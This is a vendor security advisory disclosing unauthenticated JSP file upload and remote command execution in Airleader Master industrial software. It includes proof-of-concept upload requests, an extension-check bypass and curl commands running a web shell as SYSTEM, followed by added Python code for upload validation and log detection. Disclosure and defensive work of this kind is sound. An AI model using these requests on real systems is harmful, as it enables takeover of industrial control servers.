-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2025-044
Product:                   Airleader Master
Manufacturer:              Airleader WF Steuerungstechnik GmbH
Affected Version(s):       <= 6.381
Tested Version(s):         6.381
Vulnerability Type:        Unrestricted Upload of File with Dangerous Type (CWE-434)
Risk Level:                Critical
Solution Status:           Unresolved
Manufacturer Notification: 2025-07-08
Solution Date:             -
Public Disclosure:         2026-03-03
CVE Reference:             CVE-2026-1358
Author of Advisory:        Angel Lomeli, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Airleader Master (see [1]) is management software for large hardware modules
that control compressed air stations, used mainly in the manufacturing
industry. The units focus on efficiency and economical use of resources,
allowing compressed air quality to be measured and controlled. They include
embedded web interfaces for data visualization and management.

The application includes multiple pages which permit unrestricted file
upload. This can be abused to upload malicious files to the web server and
achieve remote command execution (RCE) on the underlying OS.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The application allows file uploads without any authentication on multiple
pages. There are generally no restrictions on the files that can be
uploaded, with the exception of a simple extension check on one of these
pages. However, this check can be easily bypassed. This permits
unauthenticated users to upload, for example, a web shell to the system,
leading to full control of the server. It was also found that the web server
runs with the highest privileges.

The following pages are affected:

#1 - /<station>/wizard/doit.jsp
#2 - /<station>/wizard/uploader/doit.jsp
#3 - /administrator/update.jsp

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

To reproduce this, follow the steps described below.
For any of the following scenarios, <station> is the name of the
pre-configured station. If no station exists, a new station can be
configured by logging in to the administrative interface as Admin with the
default credentials reported in a previous advisory (SYSS-2020-033, see [2]).

#1 - Unauthenticated insecure upload: /<station>/wizard/doit.jsp

1. Send a JSP shell in the "qqfile" parameter of a multipart request. The
   page has a simple check that verifies whether the file has an image
   extension in its name. This can be easily bypassed by including an image
   extension anywhere in the filename. No authentication is required.

Request:

POST /<station>/wizard/doit.jsp HTTP/1.1
Host: <host>
Content-Type: multipart/form-data; boundary=---------------------------6139936709994052754037219976
Content-Length: 869

- -----------------------------6139936709994052754037219976
Content-Disposition: form-data; name="qqfile"; filename="cmdjsp.jpg.jsp"
Content-Type: image/png

...
[JSP web shell content]
- -----------------------------6139936709994052754037219976--

2. The web shell can then be reached at the following path:
   /<station>/wizard/images/panel/

$ curl http://<host>/<station>/wizard/images/panel/cmdjsp.jpg.jsp?cmd=whoami
...
nt-authority\system
#2 - Unauthenticated insecure upload: /<station>/wizard/uploader/doit.jsp

1. Send a JSP shell as stated above. This page does not have any extension
   checks. No authentication is required.

Request:

POST /<station>/wizard/uploader/doit.jsp HTTP/1.1
...
- -----------------------------6139936709994052754037219976
Content-Disposition: form-data; name="qqfile"; filename="cmdjsp.jsp"
Content-Type: image/png

[JSP web shell content]

2. Just like before, the web shell can then be reached at the path below:
   /<station>/wizard/images/panel/

$ curl http://<host>/<station>/wizard/images/panel/cmdjsp.jsp?cmd=whoami
...
nt-authority\system
#3 - Unauthenticated insecure upload: /administrator/update.jsp

1. Send a JSP just like before, but use the parameter "datei".

Request:

POST /administrator/update.jsp HTTP/1.1
...
- -----------------------------6139936709994052754037219976
Content-Disposition: form-data; name="datei"; filename="cmdjsp.jsp"
Content-Type: image/png

[JSP web shell content]

2. The web shell can then be reached at the following path:
   /administrator/wars/

$ curl http://<host>/administrator/wars/cmdjsp.jsp?cmd=whoami
...
nt-authority\system
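The following Python example is added here and is not part of this advisory or of the Airleader Master product. It places a reconstruction of the weak check described in PoC #1 (an image extension anywhere in the filename accepts "cmdjsp.jpg.jsp") next to a strict allowlist check of the kind the Solution section asks for: one extension only, allowlisted, content signature matching, a server-generated stored name, and storage outside the served directory tree. The regular expression, the magic-byte table and the storage layout are this example's own assumptions.

```python
# Added example (not part of the SySS advisory or of Airleader Master):
# the weak filename check described in PoC #1 next to a strict allowlist
# check plus server-side naming, as the Solution section recommends.
import os
import re
import secrets
import tempfile
from typing import Optional

IMAGE_EXTENSIONS = ("png", "jpg", "jpeg", "gif")

# Allowlisted extensions with the file signatures the content must start with
# (standard PNG, JPEG and GIF magic bytes).
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def weak_check(filename: str) -> bool:
    """Reconstruction (an assumption) of the check the advisory describes for
    /wizard/doit.jsp: it only asks whether an image extension appears somewhere
    in the name, so "cmdjsp.jpg.jsp" is accepted and later served as JSP."""
    lower = filename.lower()
    return any("." + ext in lower for ext in IMAGE_EXTENSIONS)


def strict_check(filename: str, head: bytes) -> Optional[str]:
    """Return the validated extension, or None if the upload must be rejected.

    The client-supplied name is reduced to its basename (no path traversal),
    must contain exactly one extension, that extension must be allowlisted,
    and the first bytes of the content must match the signature for that type.
    The Content-Type header is deliberately not consulted: it is client-controlled.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    match = re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})", base)
    if match is None:
        return None
    ext = match.group(1).lower()
    if ext not in ALLOWED_TYPES:
        return None
    if not any(head.startswith(sig) for sig in ALLOWED_TYPES[ext]):
        return None
    return ext


def server_side_name(ext: str) -> str:
    """The stored name is generated here, never taken from the request, so the
    value in the Content-Disposition header never reaches the filesystem."""
    return secrets.token_hex(16) + "." + ext


def store_upload(filename: str, content: bytes, upload_dir: str) -> Optional[str]:
    """Validate and write the file under upload_dir, which must lie outside the
    directory tree the servlet container serves, so that nothing stored here
    can ever be executed as JSP. Returns the stored path or None."""
    ext = strict_check(filename, content[:8])
    if ext is None:
        return None
    os.makedirs(upload_dir, exist_ok=True)
    path = os.path.join(upload_dir, server_side_name(ext))
    with open(path, "wb") as fh:
        fh.write(content)
    return path


if __name__ == "__main__":
    jsp_payload = b"<% out.println(1); %>"            # constructed non-image content
    png_payload = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16  # constructed PNG header
    for name, body in (("cmdjsp.jpg.jsp", jsp_payload), ("logo.png", png_payload)):
        print(name, "weak:", weak_check(name), "strict:", strict_check(name, body[:8]))
    with tempfile.TemporaryDirectory() as d:
        print("stored:", store_upload("../../logo.png", png_payload, d))
```

The "exactly one extension" rule is what defeats the doubled-extension name from PoC #1; the signature check additionally rejects a file that is correctly named but does not contain an image. Neither check replaces the second layer from the Solution section: a servlet container executes any .jsp it is asked to serve from a mapped directory, so uploads must live where the container never serves from, under names the client did not choose.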
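As an added example that is not part of this advisory, the detection logic below runs over constructed web-server access log lines and flags the two events the three PoCs leave behind: a POST to one of the upload handlers, and a request for a .jsp file under one of the directories the uploads land in. The endpoint paths and drop directories are taken from the advisory; the log format (Tomcat-style common log format), client addresses and timestamps are constructed for the example.

```python
# Added example (not part of the SySS advisory): detection logic over
# web-server access log lines for the upload handlers and web-shell drop
# locations named in the advisory. Log format, addresses and timestamps are
# constructed for this example.
import re
from typing import Dict, List, Optional

# Upload handlers from the advisory, matched as path suffixes because the
# first path segment of the wizard pages is the configured station name.
UPLOAD_ENDPOINTS = (
    "/wizard/doit.jsp",
    "/wizard/uploader/doit.jsp",
    "/administrator/update.jsp",
)
# Directories the uploads land in; a .jsp requested from them is never legitimate.
UPLOAD_DIRS = ("/wizard/images/panel/", "/administrator/wars/")

# Common log format as written by Tomcat's AccessLogValve (assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample: one client uploads and then calls its shell, one client
# fetches a real image, one client probes the other drop directory.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Mar/2026:10:01:02 +0000] "GET /station1/wizard/index.jsp HTTP/1.1" 200 5120
10.0.0.5 - - [03/Mar/2026:10:01:09 +0000] "POST /station1/wizard/doit.jsp HTTP/1.1" 200 41
10.0.0.5 - - [03/Mar/2026:10:01:15 +0000] "GET /station1/wizard/images/panel/cmdjsp.jpg.jsp?cmd=whoami HTTP/1.1" 200 23
10.0.0.7 - - [03/Mar/2026:10:02:00 +0000] "GET /station1/wizard/images/panel/logo.png HTTP/1.1" 200 8192
10.0.0.9 - - [03/Mar/2026:10:03:30 +0000] "GET /administrator/wars/x.jsp HTTP/1.1" 404 0
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one access log line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious request, in log order."""
    findings: List[Dict[str, str]] = []
    uploaders = set()  # clients that hit an upload handler earlier in the log
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if rec["method"] == "POST" and path.endswith(UPLOAD_ENDPOINTS):
            uploaders.add(rec["ip"])
            findings.append({"ip": rec["ip"], "severity": "medium",
                             "reason": "request to unauthenticated upload handler",
                             "path": path})
        elif path.lower().endswith(".jsp") and any(d in path for d in UPLOAD_DIRS):
            # A 404 still matters: it is a probe for a previously planted file.
            severity = "critical" if rec["ip"] in uploaders else "high"
            findings.append({"ip": rec["ip"], "severity": severity,
                             "reason": "JSP requested from upload directory",
                             "path": path})
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f["severity"].upper(), f["ip"], f["reason"], f["path"])
```

The rule keys on the directory plus the .jsp suffix rather than on the file names used in the PoCs, so renamed shells are caught as well; the escalation to "critical" when the same client was seen on an upload handler earlier in the log ties the drop to the upload. Since the handlers require no authentication, every POST to them from outside the expected engineering hosts deserves a look, not only those followed by a .jsp request.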
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The vendor has not yet released a security update.

The web application should limit the type of files that can be uploaded to
the server. Only files specified in an allowlist should be permitted, while
anything that differs should be blocked. The server should also have
protective measures in place so that files uploaded by users are never
executed as part of the application's source code. Ideally, the web server
should not run with the highest privileges of the underlying operating
system.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-06-18: Vulnerability discovered
2025-07-08: Vulnerability reported to manufacturer
2025-07-15: Contact retry
2026-03-03: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Airleader modules
    https://www.airleader.de/produkte
[2] SySS Security Advisory SYSS-2020-033
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-033.txt
[3] SySS Security Advisory SYSS-2025-044
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-044.txt
[4] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[5] CISA Security Advisory ICSA-26-043-10
    https://www.cisa.gov/news-events/ics-advisories/icsa-26-043-10

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Angel Lomeli, SySS GmbH.

E-Mail: angel.lomeli@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Angel_Lomeli.asc
Key ID: 0x3511BA21C68F0D7A
Key Fingerprint: A081 85AB C051 78ED CE8A F8E2 3511 BA21 C68F 0D7A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" and
without warranty of any kind. Details of this security advisory may be
updated in order to provide as accurate information as possible. The latest
version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en

-----BEGIN PGP SIGNATURE-----

iHUEARYKAB0WIQSggYWrwFF47c6K+OI1Ebohxo8NegUCaaBSQgAKCRA1Ebohxo8N
esQhAP46ERvt+3FkCd3wdW5lhKkn7jCiELyMlja5eFhavAo0vAD/UDhlWW3YWWvF
fRb4+ztieP0B/ApGkL7YSFx2itGoAAA=
=4htf
-----END PGP SIGNATURE-----